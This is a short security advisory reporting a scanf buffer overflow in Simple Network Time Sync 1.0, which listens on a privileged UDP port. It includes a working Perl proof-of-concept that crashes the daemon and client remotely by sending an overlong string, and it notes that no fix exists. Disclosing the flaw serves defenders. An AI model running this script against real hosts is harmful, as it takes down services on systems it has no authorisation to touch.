Vulnerability

    Simple Network Time Sync

Affected

    Simple Network Time Sync

Description

    'logistix' found following.  He noticed an uncommon scanf overflow
    in the  Simple Network  Time Sync  daemon and  client version 1.0,
    tested on Redhat 6.1.  He  hasn't looked into this fully yet,  but
    it looks  as tho  it could  be root  comprimising as  it sits on a
    priveledged  udp  port  and  seems  to  coredump,  but  looks like
    it only gives  you 50 chars  to run code  with.  He  included some
    perl here which will crash it remotely by sending it a string over
    50 chars.

    #!/usr/bin/perl -w
    #
    # Usage: ./kill_sntsd <hostname>
    #
    
    use Socket;
    
    send_packet(); # Needs to send 2 packets to kill the client
    and the server daemons
    send_packet();
    
    sub send_packet {
    
    $proto = getprotobyname('udp');
    $localaddr = gethostbyname("localhost") || die "error: $!
    \n";
    $iaddr = gethostbyname($ARGV[0]) || die "$!\n";
    $sin = sockaddr_in(724, $iaddr);
    $paddr = sockaddr_in(53, $localaddr);
    socket(SH, PF_INET, SOCK_DGRAM, $proto);
    bind(SH, $paddr);
    
    $|=1;
    
    connect(SH, $sin) || die "$!\n";
    
    # A string longer than 50 characters...
    print
    SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix
    \n";
    close(SH);
    
    }

Solution

    Nothing yet.